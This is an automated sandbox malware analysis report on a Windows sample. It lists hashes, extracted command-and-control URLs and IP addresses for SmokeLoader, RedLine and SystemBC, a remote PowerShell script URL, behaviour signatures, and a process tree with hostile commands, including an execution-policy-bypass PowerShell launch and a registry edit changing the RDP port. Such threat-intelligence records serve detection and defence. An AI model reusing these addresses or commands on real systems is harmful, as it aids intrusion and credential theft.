Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
09-12-2021 11:41
Static task
static1
Behavioral task
behavioral1
Sample
a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe
Resource
win10-en-20211208
General
-
Target
a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe
-
Size
299KB
-
MD5
a7b8bb9f2aaf5c1a07af5fdfabb2a1f4
-
SHA1
e5d892d8c416d2768f12e7f45c8588a0c98f5987
-
SHA256
74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b
-
SHA512
041a14d3f3cc4d4264b5a151330c7022606d715888c3b30bc169010475e9171e1fa37c96181255e8d32fd6065a90a64f5a8df693fe3a5a0c9f92bd83998511f9
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Extracted
redline
195.133.47.114:38627
Extracted
redline
1488
80.66.87.52:80
Extracted
systembc
185.209.30.180:4001
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
Processes:
resource yara_rule behavioral2/memory/3744-123-0x0000000000190000-0x00000000001F8000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\AC0C.exe family_redline C:\Users\Admin\AppData\Local\Temp\AC0C.exe family_redline behavioral2/memory/2936-167-0x0000000000260000-0x00000000002CC000-memory.dmp family_redline behavioral2/memory/2552-194-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/2552-196-0x0000000000418FB6-mapping.dmp family_redline behavioral2/memory/2552-210-0x00000000056D0000-0x0000000005CD6000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 88 2544 powershell.exe 90 2544 powershell.exe 91 2544 powershell.exe 92 2544 powershell.exe 94 2544 powershell.exe 96 2544 powershell.exe 98 2544 powershell.exe 100 2544 powershell.exe 102 2544 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
Processes:
93FF.exeAC0C.exeD753.exeKnots.exeKnots.exe818.exe818.exe66B4.exepid process 3744 93FF.exe 1480 AC0C.exe 2936 D753.exe 2140 Knots.exe 2552 Knots.exe 1836 818.exe 1164 818.exe 3524 66B4.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 1880 -
Loads dropped DLL 2 IoCs
Processes:
pid process 428 428 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
93FF.exeD753.exepid process 3744 93FF.exe 2936 D753.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Knots.exedescription pid process target process PID 2140 set thread context of 2552 2140 Knots.exe Knots.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 21 IoCs
Processes:
powershell.exe818.exepowershell.exedescription ioc process File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\Tasks\wow64.job 818.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBB3D.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBADB.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBB1B.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBB2C.tmp powershell.exe File created C:\Windows\Tasks\wow64.job 818.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zisfoqq2.ykd.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_rvrbkaip.ji2.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBB0B.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 91 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 92 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 94 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 90 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exepid process 2420 a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe 2420 a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 1880 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 1880 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 616 616 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exepid process 2420 a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
93FF.exeAC0C.exeKnots.exeD753.exeKnots.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeDebugPrivilege 3744 93FF.exe Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeDebugPrivilege 1480 AC0C.exe Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeDebugPrivilege 2140 Knots.exe Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeDebugPrivilege 2936 D753.exe Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeDebugPrivilege 2552 Knots.exe Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeShutdownPrivilege 1880 Token: SeCreatePagefilePrivilege 1880 Token: SeDebugPrivilege 1016 powershell.exe Token: SeDebugPrivilege 3704 powershell.exe Token: SeIncreaseQuotaPrivilege 3704 powershell.exe Token: SeSecurityPrivilege 3704 powershell.exe Token: SeTakeOwnershipPrivilege 3704 powershell.exe Token: SeLoadDriverPrivilege 3704 powershell.exe Token: SeSystemProfilePrivilege 3704 powershell.exe Token: SeSystemtimePrivilege 3704 powershell.exe Token: SeProfSingleProcessPrivilege 3704 powershell.exe Token: SeIncBasePriorityPrivilege 3704 powershell.exe Token: SeCreatePagefilePrivilege 3704 powershell.exe Token: SeBackupPrivilege 3704 powershell.exe Token: SeRestorePrivilege 3704 powershell.exe Token: SeShutdownPrivilege 3704 powershell.exe Token: SeDebugPrivilege 3704 powershell.exe Token: SeSystemEnvironmentPrivilege 3704 powershell.exe Token: SeRemoteShutdownPrivilege 3704 powershell.exe Token: SeUndockPrivilege 3704 powershell.exe Token: SeManageVolumePrivilege 3704 powershell.exe Token: 33 3704 powershell.exe Token: 34 3704 powershell.exe Token: 35 3704 powershell.exe Token: 36 3704 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid process 1880 1880 -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid process 1880 1880 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
AC0C.exeKnots.exe66B4.exepowershell.execsc.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exedescription pid process target process PID 1880 wrote to memory of 3744 1880 93FF.exe PID 1880 wrote to memory of 3744 1880 93FF.exe PID 1880 wrote to memory of 3744 1880 93FF.exe PID 1880 wrote to memory of 1480 1880 AC0C.exe PID 1880 wrote to memory of 1480 1880 AC0C.exe PID 1880 wrote to memory of 1480 1880 AC0C.exe PID 1880 wrote to memory of 2936 1880 D753.exe PID 1880 wrote to memory of 2936 1880 D753.exe PID 1880 wrote to memory of 2936 1880 D753.exe PID 1480 wrote to memory of 2140 1480 AC0C.exe Knots.exe PID 1480 wrote to memory of 2140 1480 AC0C.exe Knots.exe PID 1480 wrote to memory of 2140 1480 AC0C.exe Knots.exe PID 2140 wrote to memory of 2552 2140 Knots.exe Knots.exe PID 2140 wrote to memory of 2552 2140 Knots.exe Knots.exe PID 2140 wrote to memory of 2552 2140 Knots.exe Knots.exe PID 2140 wrote to memory of 2552 2140 Knots.exe Knots.exe PID 2140 wrote to memory of 2552 2140 Knots.exe Knots.exe PID 2140 wrote to memory of 2552 2140 Knots.exe Knots.exe PID 2140 wrote to memory of 2552 2140 Knots.exe Knots.exe PID 2140 wrote to memory of 2552 2140 Knots.exe Knots.exe PID 1880 wrote to memory of 1836 1880 818.exe PID 1880 wrote to memory of 1836 1880 818.exe PID 1880 wrote to memory of 1836 1880 818.exe PID 1880 wrote to memory of 3524 1880 66B4.exe PID 1880 wrote to memory of 3524 1880 66B4.exe PID 3524 wrote to memory of 1016 3524 66B4.exe powershell.exe PID 3524 wrote to memory of 1016 3524 66B4.exe powershell.exe PID 1016 wrote to memory of 592 1016 powershell.exe csc.exe PID 1016 wrote to memory of 592 1016 powershell.exe csc.exe PID 592 wrote to memory of 1196 592 csc.exe cvtres.exe PID 592 wrote to memory of 1196 592 csc.exe cvtres.exe PID 1016 wrote to memory of 4052 1016 powershell.exe csc.exe PID 1016 wrote to memory of 4052 1016 powershell.exe csc.exe PID 4052 wrote to memory of 2828 4052 csc.exe cvtres.exe PID 4052 wrote to memory of 2828 4052 csc.exe cvtres.exe PID 1016 wrote to memory of 3704 1016 powershell.exe powershell.exe PID 1016 wrote to memory of 3704 1016 powershell.exe powershell.exe PID 1016 wrote to memory of 2784 1016 powershell.exe powershell.exe PID 1016 wrote to memory of 2784 1016 powershell.exe powershell.exe PID 1016 wrote to memory of 1196 1016 powershell.exe powershell.exe PID 1016 wrote to memory of 1196 1016 powershell.exe powershell.exe PID 1016 wrote to memory of 1292 1016 powershell.exe reg.exe PID 1016 wrote to memory of 1292 1016 powershell.exe reg.exe PID 1016 wrote to memory of 1136 1016 powershell.exe reg.exe PID 1016 wrote to memory of 1136 1016 powershell.exe reg.exe PID 1016 wrote to memory of 928 1016 powershell.exe reg.exe PID 1016 wrote to memory of 928 1016 powershell.exe reg.exe PID 1016 wrote to memory of 4028 1016 powershell.exe net.exe PID 1016 wrote to memory of 4028 1016 powershell.exe net.exe PID 4028 wrote to memory of 3372 4028 net.exe net1.exe PID 4028 wrote to memory of 3372 4028 net.exe net1.exe PID 1016 wrote to memory of 392 1016 powershell.exe cmd.exe PID 1016 wrote to memory of 392 1016 powershell.exe cmd.exe PID 392 wrote to memory of 3448 392 cmd.exe cmd.exe PID 392 wrote to memory of 3448 392 cmd.exe cmd.exe PID 3448 wrote to memory of 2960 3448 cmd.exe net.exe PID 3448 wrote to memory of 2960 3448 cmd.exe net.exe PID 2960 wrote to memory of 3868 2960 net.exe net1.exe PID 2960 wrote to memory of 3868 2960 net.exe net1.exe PID 1016 wrote to memory of 68 1016 powershell.exe cmd.exe PID 1016 wrote to memory of 68 1016 powershell.exe cmd.exe PID 68 wrote to memory of 3432 68 cmd.exe cmd.exe PID 68 wrote to memory of 3432 68 cmd.exe cmd.exe PID 3432 wrote to memory of 2108 3432 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe"C:\Users\Admin\AppData\Local\Temp\a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\93FF.exeC:\Users\Admin\AppData\Local\Temp\93FF.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\AC0C.exeC:\Users\Admin\AppData\Local\Temp\AC0C.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Knots.exe"C:\Users\Admin\AppData\Local\Temp\Knots.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Knots.exeC:\Users\Admin\AppData\Local\Temp\Knots.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\D753.exeC:\Users\Admin\AppData\Local\Temp\D753.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\818.exeC:\Users\Admin\AppData\Local\Temp\818.exe1⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\818.exeC:\Users\Admin\AppData\Local\Temp\818.exe start1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\66B4.exeC:\Users\Admin\AppData\Local\Temp\66B4.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yslfveqh\yslfveqh.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C4B.tmp" "c:\Users\Admin\AppData\Local\Temp\yslfveqh\CSCD8AF42A3F41B44E48AB9BE8C7AC1C03D.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d4myurk4\d4myurk4.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES815C.tmp" "c:\Users\Admin\AppData\Local\Temp\d4myurk4\CSC164F69DC1D604A2CA266B1C51A7947C4.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
